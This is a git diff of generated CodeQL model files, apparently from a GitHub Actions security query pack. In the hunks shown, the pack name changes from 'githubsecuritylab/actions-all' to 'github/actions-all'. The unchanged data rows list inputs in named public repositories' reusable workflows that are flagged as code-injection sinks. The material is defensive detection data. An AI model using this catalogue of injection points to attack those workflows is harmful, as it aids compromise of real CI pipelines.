a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index cd5d5ff7d0fd..9b1fd73494e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index fd17e601d805..2fafb1f39b6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index bed40dce4298..0f4b87acc625 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 62a12e471389..4b58c4a27b1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 7491c4f951af..36e6df71d47a 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 1876f1146cbf..444291b0c50b 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 4a8534429f90..ebd11dd18113 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index ecac3f22f851..3dfd3db12f59 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index ffc4193edbf1..a47ce91bf1b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index 93b29308ff27..f4114b0a3960 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index c5965c5d8efc..a5b367ab3557 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 1fc5159e55a5..5aab353540a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index bce14a98edd5..db6b7c28c514 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 0439d6e1d4ce..bd2ceb9eeb16 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 357e11b3c0ba..d52fc08b2fe0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 4d3ea1e91562..8a664d1bc87b 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 44b905cab672..bbfe6cfc5015 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 192d975ea573..75bbf328d641 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 627fca5d3ff2..6cd55f46f646 100644 
--- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4d4fd0f229ec..4c85243e4155 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 1ceacd2f1c0f..fd1c5ae41497 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index ba0f5c06a672..d848e7587ca3 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 3c8f11dd0cd8..e2e3fa8f5936 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index b7c00fff318d..69d627bdc7fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 5a129691bc5c..11687fa31b63 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index bd07156d06b5..3d3947515997 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index b029e3417102..2fb4ca827636 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 995e692e4945..92d91e541b90 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index db325a06baa5..ebf68ff3c126 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2c91ab62b0c8..22f0fedcc07e 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 8fdf39a0bbcf..23da361034c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 00fceb9c7bd2..19a5da19960b 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index a6b947dfbce7..abd0215aadad 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 9359ea482c03..5144d9ee2cb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 023666e67ffb..5a70ae48ec63 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 7005b7dd7c91..81130d31fa38 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8b73f89401a7..f49f239ac9bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 3cf43b814db7..53be189b31ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index d33e308c7ebb..2d6132a396fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 5c1de93f08af..0cb5e01e3aa9 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index aab9fa502cb7..cd3ca5d7c011 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index b58fff831e11..c8f1b93ef2d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index f96264fbf423..7877af9bbbf6 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 6aaf6aa27834..3d9b87166823 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index d246f4ce6444..b14db181cce9 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index a35a1a628e6b..6a883e369c02 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index ec22645570f7..9612750345dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index e0eccb26a54b..2c6f4438846e 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml 